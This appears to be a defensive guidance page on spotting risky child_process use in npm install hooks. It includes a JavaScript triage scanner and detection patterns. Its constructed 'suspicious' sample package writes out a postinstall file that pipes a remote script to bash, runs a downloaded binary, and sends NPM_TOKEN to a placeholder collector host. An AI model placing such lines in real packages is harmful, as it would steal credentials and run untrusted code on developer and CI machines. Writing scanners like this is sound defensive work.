Required Reading
~5 min
About child_process
When it’s normal vs. when it’s a red flag.
Risk guidance
When it is normal (Low to Medium)
- Native modules compiling during install (node-gyp) calling toolchains like make or python.
- Explicit build steps downloading from trusted GitHub Releases of the same project.
- CLI wrappers that call git or system tools at runtime, not during install.
High-risk patterns (High)
- Downloads from unknown hosts; pipes to shell (curl … | bash).
- Reads tokens or secrets from env; uploads to remote endpoints.
- Heavy obfuscation with encoded strings and dynamic eval.
- chmod +x then executes a downloaded file.
- Appears inside lifecycle scripts (preinstall/install/postinstall/prepare).
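The two lists above (expected install-time and runtime use versus the red flags) can be turned into a first-pass triage. The following is an added example, not code from the original page: a regex-based pass over a parsed package.json and a map of file path to source text that assigns Low / Medium / High findings along the lines of the guidance. The allow-listed hosts, the rule names, and the sample packages are all constructed for this example; it is a review aid that tells you what to read first, not a proof that a package is safe.

```javascript
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare'];

// Assumption: build-time downloads are only allowed from GitHub Releases,
// matching the page's "trusted GitHub Releases of the same project".
const TRUSTED_HOSTS = new Set(['github.com', 'objects.githubusercontent.com']);

const CP_IMPORT =
  /require\(\s*['"](node:)?child_process['"]\s*\)|from\s+['"](node:)?child_process['"]/;

// The page's high-risk patterns, each as a predicate over one string
// (a lifecycle command line or a source file).
const HIGH_RISK = [
  { rule: 'pipe-to-shell',
    test: s => /\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b/.test(s) },
  { rule: 'chmod-then-exec',
    test: s => /chmod\s+\+x/.test(s) &&
      /(&&|;)\s*\.?\/|\b(exec|execSync|execFile|execFileSync|spawn|spawnSync)\s*\(/.test(s) },
  { rule: 'env-secret-to-network',
    test: s => /process\.env\.\w*(TOKEN|SECRET|KEY|PASSWORD)\w*/i.test(s) &&
      /\b(fetch|https?\.request|net\.connect|axios)\s*\(|\bcurl\b/.test(s) },
  { rule: 'obfuscated-eval',
    test: s => /\b(eval|new Function)\s*\(/.test(s) &&
      /['"]base64['"]|\\x[0-9a-fA-F]{2}/.test(s) },
];

// Hosts named in http(s) URLs that are not on the allow list (port stripped).
function untrustedHosts(s) {
  const out = [];
  for (const m of s.matchAll(/https?:\/\/([^\s/'"`)]+)/g)) {
    const host = m[1].toLowerCase().replace(/:\d+$/, '');
    if (!TRUSTED_HOSTS.has(host)) out.push(host);
  }
  return out;
}

function triage(pkg, files) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  const add = (where, rule, severity, detail) => findings.push({ where, rule, severity, detail });
  const installTime = {}; // where -> text that npm executes during install

  for (const hook of LIFECYCLE) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const where = `scripts.${hook}`;
    // A node-gyp build is expected install-time work (Low); any other
    // lifecycle command deserves a look (Medium) before the content rules run.
    add(where, 'lifecycle-script', /^node-gyp\b/.test(cmd) ? 'Low' : 'Medium', cmd);
    installTime[where] = cmd;
    for (const [file, src] of Object.entries(files)) {
      if (cmd.includes(file) && CP_IMPORT.test(src)) {
        add(file, 'child_process-in-lifecycle', 'High', `reached from ${where}`);
        installTime[file] = src;
      }
    }
  }
  // child_process used only at runtime (e.g. a CLI wrapper calling git) is Low.
  const toScan = { ...installTime };
  for (const [file, src] of Object.entries(files)) {
    if (!CP_IMPORT.test(src)) continue;
    if (!installTime[file]) add(file, 'child_process-at-runtime', 'Low', 'not reached from a lifecycle script');
    toScan[file] = src;
  }
  for (const [where, text] of Object.entries(toScan)) {
    for (const r of HIGH_RISK) if (r.test(text)) add(where, r.rule, 'High', '');
    for (const h of untrustedHosts(text)) add(where, 'download-from-unknown-host', 'High', h);
  }
  const rank = { Low: 0, Medium: 1, High: 2 };
  const level = findings.reduce((acc, f) => (rank[f.severity] > rank[acc] ? f.severity : acc), 'Low');
  return { level, findings };
}

// Constructed sample packages for the demo; none of these are real packages.
const SAMPLES = {
  nativeModule: {
    pkg: { name: 'fast-hash', scripts: { install: 'node-gyp rebuild' } },
    files: { 'index.js': "const addon = require('./build/Release/addon');" },
  },
  cliWrapper: {
    pkg: { name: 'git-helper', scripts: { test: 'node test.js' } },
    files: { 'bin/cli.js': "const { execFileSync } = require('node:child_process');\n" +
                           "module.exports = () => execFileSync('git', ['status']);" },
  },
  suspicious: {
    pkg: { name: 'color-utils', scripts: { postinstall: 'node scripts/setup.js' } },
    files: { 'scripts/setup.js': [
      "const { execSync } = require('child_process');",
      "execSync('curl -sSL https://cdn.example.invalid/x.sh | bash');",
      "execSync('chmod +x ./x && ./x');",
      "const t = process.env.NPM_TOKEN;",
      "fetch('https://collector.example.invalid/?t=' + t);",
      "eval(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString());",
    ].join('\n') },
  },
};

function triageSample(name) {
  return triage(SAMPLES[name].pkg, SAMPLES[name].files);
}

for (const name of Object.keys(SAMPLES)) {
  const r = triageSample(name);
  console.log(`${name}: ${r.level}`);
  for (const f of r.findings) console.log(`  [${f.severity}] ${f.rule} @ ${f.where} ${f.detail}`);
}
```

The rules deliberately scan both the lifecycle command strings and any file those strings reference, because the page's point is that child_process is routine at runtime but the same call reached from preinstall/install/postinstall/prepare runs on every developer and CI machine that installs the package.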
What to do (Action)
- Isolate builds; run with --network=none unless a specific host is whitelisted.
- Replace or pin the dependency; require two-person review for exceptions.
- Require checksum/signature verification for allowed remote binaries.